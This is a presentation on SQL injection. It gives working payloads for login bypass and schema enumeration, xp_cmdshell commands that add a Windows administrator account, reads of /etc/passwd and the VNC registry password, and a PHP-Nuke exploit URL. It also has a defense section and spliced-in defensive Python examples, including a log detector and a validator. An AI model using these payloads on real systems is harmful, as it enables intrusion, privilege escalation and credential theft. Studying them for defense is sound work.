Advanced SQL Injection: How 2 hAcK SQL queries && …

Ali Mehrabian

http://logicman.net

mail@logicman.net


What is SQL?

  • SQL stands for Structured Query Language
  • Allows us to access a database
  • ANSI and ISO standard computer language
  • SQL can:
    • execute queries against a database
    • retrieve data from a database
    • insert new records in a database
    • delete records from a database
    • update records in a database

SQL is a Standard - but...

  • There are many different versions of the SQL language
  • They support the same major keywords in a similar manner (such as SELECT, UPDATE, DELETE, INSERT, WHERE, and others).
  • Most of the SQL database programs also have their own proprietary extensions in addition to the SQL standard!

SQL Database Tables

  • A relational database contains one or more tables, each identified by a name
  • Tables contain records (rows) with data
  • For example, the following table is called "users" and contains data distributed in rows and columns:

SQL Queries

  • With SQL, we can query a database and have a result set returned
  • Using the previous table, a query like this:

SELECT LastName FROM users WHERE UserID = 1;

  • Gives a result set like this:

LastName

--------------

Smith

What is SQL Injection?

The ability to inject SQL commands into the database engine through an existing application

How common is it?

  • It is probably the most common Website vulnerability today!
  • It is a flaw in "web application" development, it is not a DB or web server problem
    • Most programmers are still not aware of this problem
    • A lot of the tutorials & demo “templates” are vulnerable
    • Even worse, a lot of solutions posted on the Internet are not good enough
  • In some pen tests over 60% of clients turn out to be vulnerable to SQL Injection

Vulnerable Applications

  • Almost all SQL databases and programming languages are potentially vulnerable
    • MS SQL Server, Oracle, MySQL, Postgres, DB2, MS Access, Sybase, Informix, etc
  • Accessed through applications developed using:
    • Perl and CGI scripts that access databases
    • ASP, JSP, PHP
    • XML, XSL and XSQL
    • Javascript
    • VB, MFC, and other ODBC-based tools and APIs
    • DB-specific Web-based applications and APIs
    • Reports and DB Applications
    • 3GL- and 4GL-based languages (C, OCI, Pro*C, and COBOL)
    • many more

How does SQL Injection work?

Common vulnerable login query

SELECT * FROM users
WHERE login = 'kEnBy'
AND password = '123'

(If it returns something then login!)

ASP/MS SQL Server login syntax

var sql = "SELECT * FROM users WHERE login = '" + formusr +
          "' AND password = '" + formpwd + "'";

Injecting through Strings

formusr = ' or 1=1 --
formpwd = anything

Final query would look like this:

SELECT * FROM users
WHERE login = '' or 1=1
--' AND password = 'anything'

The power of '

  • It closes the string parameter
  • Everything after is considered part of the SQL command
  • Misleading Internet suggestions include:
    • Escape it: replace ' with ''
  • String fields are very common but there are other types of fields:
    • Numeric
    • Dates

If it were numeric?

SELECT * FROM clients
WHERE account = 12345678
AND pin = 1111

PHP/MySQL login syntax

$sql = "SELECT * FROM clients WHERE " .
       "account = $formacct AND " .
       "pin = $formpin";

Injecting Numeric Fields

$formacct = 1 or 1=1 #
$formpin = 1111

Final query would look like this:

SELECT * FROM clients
WHERE account = 1 or 1=1
# AND pin = 1111
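To see the string-field and numeric-field cases above side by side with the fix, here is an added Python/SQLite example that is not part of the presentation. The function names (make_db, login_concat, pin_check_concat, login_param, pin_check_param, demo) and the one-row tables are constructed for this example, and the MySQL `#` comment from the slide is replaced by `--` because SQLite does not treat `#` as a comment.

```python
import sqlite3

# Constructed sample data (not from the slides): one user and one client row,
# matching the values used in the login queries above.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('kEnBy', '123')")
    db.execute("CREATE TABLE clients (account INTEGER, pin INTEGER)")
    db.execute("INSERT INTO clients VALUES (12345678, 1111)")
    return db

# --- Vulnerable: query text assembled by concatenation, like the ASP/PHP snippets ---

def login_concat(db, formusr, formpwd):
    sql = "SELECT * FROM users WHERE login = '" + formusr + \
          "' AND password = '" + formpwd + "'"
    return db.execute(sql).fetchone() is not None

def pin_check_concat(db, formacct, formpin):
    sql = "SELECT * FROM clients WHERE account = " + formacct + \
          " AND pin = " + formpin
    return db.execute(sql).fetchone() is not None

# --- Hardened: placeholders keep user data out of the SQL grammar ---

def login_param(db, formusr, formpwd):
    sql = "SELECT * FROM users WHERE login = ? AND password = ?"
    return db.execute(sql, (formusr, formpwd)).fetchone() is not None

def pin_check_param(db, formacct, formpin):
    # Numeric fields: convert first, so anything that is not an integer is
    # refused before it reaches the database.
    try:
        account, pin = int(formacct), int(formpin)
    except ValueError:
        return False
    sql = "SELECT * FROM clients WHERE account = ? AND pin = ?"
    return db.execute(sql, (account, pin)).fetchone() is not None

def demo():
    """Run the slides' payloads against both versions; True means the login
    check passed without valid credentials."""
    db = make_db()
    string_payload = "' or 1=1 --"
    numeric_payload = "1 or 1=1 --"
    return {
        "concat_string_bypassed": login_concat(db, string_payload, "anything"),
        "param_string_bypassed": login_param(db, string_payload, "anything"),
        "concat_numeric_bypassed": pin_check_concat(db, numeric_payload, "1111"),
        "param_numeric_bypassed": pin_check_param(db, numeric_payload, "1111"),
        "param_valid_login": login_param(db, "kEnBy", "123"),
        "param_valid_pin": pin_check_param(db, "12345678", "1111"),
    }

if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The concatenated versions accept both payloads; the parameterized versions only accept the real credentials, and the numeric one rejects the payload before any SQL is run.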

SQL Injection Characters

  • ' or " character string indicators
  • -- or # single-line comment
  • /*…*/ multiple-line comment
  • + addition, concatenate (or space in URL)
  • || (double pipe) concatenate
  • % wildcard attribute indicator
  • ?Param1=foo&Param2=bar URL parameters
  • PRINT useful as non-transactional command
  • @variable local variable
  • @@variable global variable
  • waitfor delay '0:0:10' time delay

SQL Injection Testing Methodology

1) Input Validation
2) Info. Gathering
3) 1=1 Attacks
4) Extracting Data
5) OS Interaction
6) OS Cmd Prompt
7) Expand Influence

slide17

Discovery of Vulnerabilities

  • Vulnerabilities can be anywhere, so we check all entry points:
    • Fields in web forms
    • Script parameters in URL query strings
    • Values stored in cookies or hidden fields
  • By "fuzzing" we insert into every one of them:
    • Character sequence: ' " ) # || + >
    • SQL reserved words with white space delimiters
      • %09select (tab%09, carriage return%13, linefeed%10 and space%32 with and, or, update, insert, exec, etc)
    • Delay query ' waitfor delay '0:0:10'--
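The same indicators that a tester probes with are what a defender can watch for in access logs. The following Python is an added example, not from the slides: it URL-decodes each query parameter of constructed Common Log Format lines and checks them against the characters and keywords listed on this slide and on the "SQL Injection Characters" slide. The sample log lines, the INDICATORS table and the "two indicator classes or a time-delay probe" threshold are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Indicator classes taken from the slides; each is applied to a URL-decoded
# parameter value, so %27, %09, %5c and friends are seen in their decoded form.
INDICATORS = {
    "quote":      re.compile(r"['\"]"),
    "comment":    re.compile(r"--|#|/\*"),
    "escape":     re.compile(r"\\"),
    "concat":     re.compile(r"\|\|"),
    "keyword":    re.compile(r"\b(select|union|insert|update|delete|exec|drop|"
                             r"having|waitfor)\b", re.I),
    "time_delay": re.compile(r"waitfor\s+delay", re.I),
}

# Request line inside a Common Log Format entry: "METHOD target HTTP/x.y"
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def decoded_params(target):
    """(name, value) pairs of the query string, URL-decoded; parse_qsl also
    turns '+' into a space, the URL use of '+' noted on the slides."""
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)

def classify_value(value):
    """Set of indicator classes present in one decoded parameter value."""
    return {name for name, rx in INDICATORS.items() if rx.search(value)}

def analyse_request(target):
    """Union of indicator classes over all parameters of one request target."""
    hits = set()
    for _, value in decoded_params(target):
        hits |= classify_value(value)
    return hits

def is_suspicious(hits):
    """Heuristic: a time-delay probe on its own, or two or more indicator
    classes together (a lone apostrophe in O'Brien is not enough)."""
    return "time_delay" in hits or len(hits) >= 2

def scan_log(lines):
    """Return (target, sorted indicator classes) for each log line whose
    request looks like an injection probe."""
    flagged = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        hits = analyse_request(m.group("target"))
        if is_suspicious(hits):
            flagged.append((m.group("target"), sorted(hits)))
    return flagged

# Constructed sample access-log lines; the payloads mirror the slides' examples,
# the benign lines show why a single indicator class is not enough on its own.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2004:13:55:36 +0000] "GET /login.asp?user=kEnBy&pass=123 HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Oct/2004:13:55:40 +0000] "GET /login.asp?user=%27%20or%201%3D1%20--&pass=x HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Oct/2004:13:55:44 +0000] "GET /item.asp?id=1%27%20waitfor%20delay%20%270:0:10%27-- HTTP/1.1" 500 88',
    '10.0.0.5 - - [10/Oct/2004:13:55:48 +0000] "GET /search.asp?q=select+a+gift HTTP/1.1" 200 2048',
    "10.0.0.5 - - [10/Oct/2004:13:55:52 +0000] \"GET /users.asp?name=O'Brien HTTP/1.1\" 200 300",
    '10.0.0.5 - - [10/Oct/2004:13:55:56 +0000] "GET /modules.php?name=Your_Account&op=saveuser&uid=2&bio=%5c&pass=x&newsletter=,+pass=md5(1)/* HTTP/1.1" 200 120',
]

if __name__ == "__main__":
    for target, hits in scan_log(SAMPLE_LOG):
        print(hits, target)
```

Decoding before matching is the important step: the `%09select` and `%27` forms on this slide look harmless to a filter that inspects the raw URL. The threshold is deliberately simple; in practice it is tuned per application, and the decoded value is also what a parameterized query would receive, so a flagged request is a signal to investigate the endpoint, not proof of a working injection.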

2) Information Gathering

  • We will try to find out the following:
    • Output mechanism
    • Understand the query
    • Determine database type
    • Find out user privilege level
    • Determine OS interaction level

Is it a stored procedure?

  • We use different injections to determine what we can or cannot do
    • ,@variable
    • ?Param1=foo&Param2=bar
    • PRINT
    • PRINT @@variable

Determine Database Engine Type

  • Most times the error messages will let us know what DB engine we are working with
    • ODBC errors will display database type as part of the driver information
  • If we have no ODBC error messages:
    • We make an educated guess based on the Operating System and Web Server
    • Or we use DB-specific characters, commands or stored procedures that will generate different error messages

Discover DB structure

  • Determine table and column names

' group by columnnames having 1=1 --

  • Discover column name types

' union select sum(columnname) from tablename --

  • Enumerate user defined tables

' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --

System Tables

  • Oracle
    • SYS.USER_OBJECTS
    • SYS.TAB
    • SYS.USER_TABLES
    • SYS.USER_VIEWS
    • SYS.ALL_TABLES
    • SYS.USER_TAB_COLUMNS
    • SYS.USER_CATALOG
  • MySQL
    • mysql.user
    • mysql.host
    • mysql.db
  • MS Access
    • MsysACEs
    • MsysObjects
    • MsysQueries
    • MsysRelationships
  • MS SQL Server
    • sysobjects
    • syscolumns
    • systypes
    • sysdatabases

Create DB Accounts

MS SQL

  • exec sp_addlogin 'kEnBy', 'Pass123'
  • exec sp_addsrvrolemember 'kEnBy', 'sysadmin'

MySQL

  • INSERT INTO mysql.user (user, host, password) VALUES ('kEnBy', 'localhost', PASSWORD('Pass123'))

Access

  • CREATE USER kEnBy IDENTIFIED BY 'Pass123'

Postgres (requires UNIX account)

  • CREATE USER kEnBy WITH PASSWORD 'Pass123'

Oracle

  • CREATE USER kEnBy IDENTIFIED BY Pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users;
  • GRANT CONNECT TO kEnBy;
  • GRANT RESOURCE TO kEnBy;

Interacting with the OS

  • Two ways to interact with the OS:
    • Reading and writing system files from disk
      • Find passwords and configuration files
      • Change passwords and configuration
      • Execute commands by overwriting initialization or configuration files
    • Direct command execution
      • We can do anything
  • Both are restricted by the database's running privileges and permissions

MySQL OS Interaction

  • MySQL
    • LOAD_FILE
      • ' union select 1,load_file('/etc/passwd'),1,1,1;
    • LOAD DATA INFILE
      • create table temp( line blob );
      • load data infile '/etc/passwd' into table temp;
      • select * from temp;
    • SELECT INTO OUTFILE

MS SQL OS Interaction

  • MS SQL Server
    • '; exec master..xp_cmdshell 'ipconfig > test.txt' --
    • '; CREATE TABLE tmp (txt varchar(8000)); BULK INSERT tmp FROM 'test.txt' --
    • '; begin declare @data varchar(8000) ; set @data='| ' ; select @data=@data+txt+' | ' from tmp where txt<@data ; select @data as x into temp end --
    • ' and 1 in (select substring(x,1,256) from temp) --
    • '; declare @var sysname; set @var = 'del test.txt'; EXEC master..xp_cmdshell @var; drop table temp; drop table tmp --

Jumping to the OS

  • Linux based MySQL
    • ' union select 1, (load_file('/etc/passwd')),1,1,1;
  • MS SQL Windows Password Creation
    • '; exec xp_cmdshell 'net user /add victor Pass123'--
    • '; exec xp_cmdshell 'net localgroup /add administrators victor' --
  • Starting Services
    • '; exec master..xp_servicecontrol 'start','FTP Publishing' --

Retrieving VNC Password from Registry

  • '; declare @out binary(8); exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\ORL\WinVNC3\Default', @value_name='Password', @value=@out output; select cast(@out as bigint) as x into TEMP --
  • ' and 1 in (select cast(x as varchar) from temp) --

SQL Injection Defense

  • It is quite simple: input validation
  • The real challenge is applying best practices consistently across all your code
    • Enforce "strong design" in new applications
    • Audit your existing websites and source code
  • Even if you have an airtight design, harden your servers

Strong Design

  • Define an easy "secure" path to querying data
    • Use stored procedures for interacting with database
    • Call stored procedures through a parameterized API
    • Validate all input through generic routines
    • Use the principle of "least privilege"
      • Define several roles, one for each kind of query

Input Validation

  • Define data types for each field
    • Implement stringent "allow only good" filters
      • If the input is supposed to be numeric, use a numeric variable in your script to store it
    • Reject bad input rather than attempting to escape or modify it
    • Implement stringent "known bad" filters
      • For example: reject "select", "insert", "update", "shutdown", "delete", "drop", "--", "'"
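An added Python example, not from the presentation, of the validation rules on this slide: a declared type per field, an "allow only good" check that refuses rather than rewrites bad input, a numeric field stored as an integer, and the "known bad" keyword filter as a second layer for free-text fields. FIELD_RULES, the field names and the helper names (validate_field, validate_form, try_validate, free_text_ok, escape_only) are hypothetical; escape_only is included only to show why the "replace ' with ''" suggestion from the earlier slide does nothing for a numeric field.

```python
import re
from datetime import date

# Hypothetical field definitions for the login and account forms on the
# earlier slides. Each field has a type and, for strings, an allowlist pattern.
FIELD_RULES = {
    "login":   ("string", re.compile(r"[A-Za-z0-9_]{1,32}")),
    "account": ("int", None),
    "pin":     ("int", None),
    "birth":   ("date", None),
}

# "Known bad" filter from this slide, used as a second layer for free text.
KNOWN_BAD = re.compile(r"select|insert|update|shutdown|delete|drop|--|'", re.I)

class ValidationError(ValueError):
    pass

def validate_field(name, raw):
    """Convert one form value to its declared type or raise ValidationError.
    The value is never escaped or trimmed into shape: bad input is refused."""
    kind, pattern = FIELD_RULES[name]
    if kind == "int":
        # Only an optionally signed run of digits passes; '1 or 1=1 #' and
        # '12345678--' are refused before any query is built.
        if not re.fullmatch(r"-?\d{1,18}", raw):
            raise ValidationError(f"{name}: not an integer")
        return int(raw)
    if kind == "date":
        try:
            return date.fromisoformat(raw)
        except ValueError:
            raise ValidationError(f"{name}: not an ISO date") from None
    if kind == "string":
        if not pattern.fullmatch(raw):
            raise ValidationError(f"{name}: characters outside allowlist")
        return raw
    raise ValidationError(f"{name}: unknown field type")

def validate_form(form):
    """Validate every submitted field; unexpected fields are rejected too."""
    clean = {}
    for name, raw in form.items():
        if name not in FIELD_RULES:
            raise ValidationError(f"unexpected field {name}")
        clean[name] = validate_field(name, raw)
    return clean

def try_validate(name, raw):
    """(True, typed value) or (False, reason), for callers that prefer not
    to catch exceptions."""
    try:
        return True, validate_field(name, raw)
    except ValidationError as e:
        return False, str(e)

def free_text_ok(text):
    """Known-bad check for fields such as a comment box that cannot be typed."""
    return KNOWN_BAD.search(text) is None

def escape_only(raw):
    """The quote-doubling suggestion the slides call misleading: a numeric
    payload contains no quote, so it passes through unchanged."""
    return raw.replace("'", "''")

if __name__ == "__main__":
    for field, value in [("account", "12345678"), ("account", "1 or 1=1 #"),
                         ("login", "kEnBy"), ("login", "' or 1=1 --"),
                         ("birth", "2004-10-10")]:
        print(field, repr(value), "->", try_validate(field, value))
    print("escape_only leaves numeric payload as:", escape_only("1 or 1=1 #"))
```

Allowlist typing does the real work: once `account` is an `int`, there is no string left to inject into, and the database call can use a placeholder with a typed value. The known-bad filter is the weaker layer (it also blocks legitimate words such as "selected"), which is why the slide lists it after the typed filters.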

PHP-Nuke SQL injection

  • Malicious url:
    • modules.php?name=Your_Account&op=saveuser&uid=2&bio=%5c&EditedMessage=no&pass=xxxxx&vpass=xxxxx&newsletter=,+pass=md5(1)/*
  • %5c is the URL encoding for '\'

References

  • A lot of SQL Injection related papers
    • http://www.nextgenss.com/papers.htm
    • http://www.spidynamics.com/support/whitepapers/
    • http://www.appsecinc.com/techdocs/whitepapers.html
    • http://www.atstake.com/research/advisories
  • Other resources
    • http://www.owasp.org
    • http://Governmentsecurity.org/Forum
    • http://ashiyane.org
    • http://www.sqlsecurity.com
    • http://www.securityfocus.com/infocus/1768

aNyQuEsTiOn?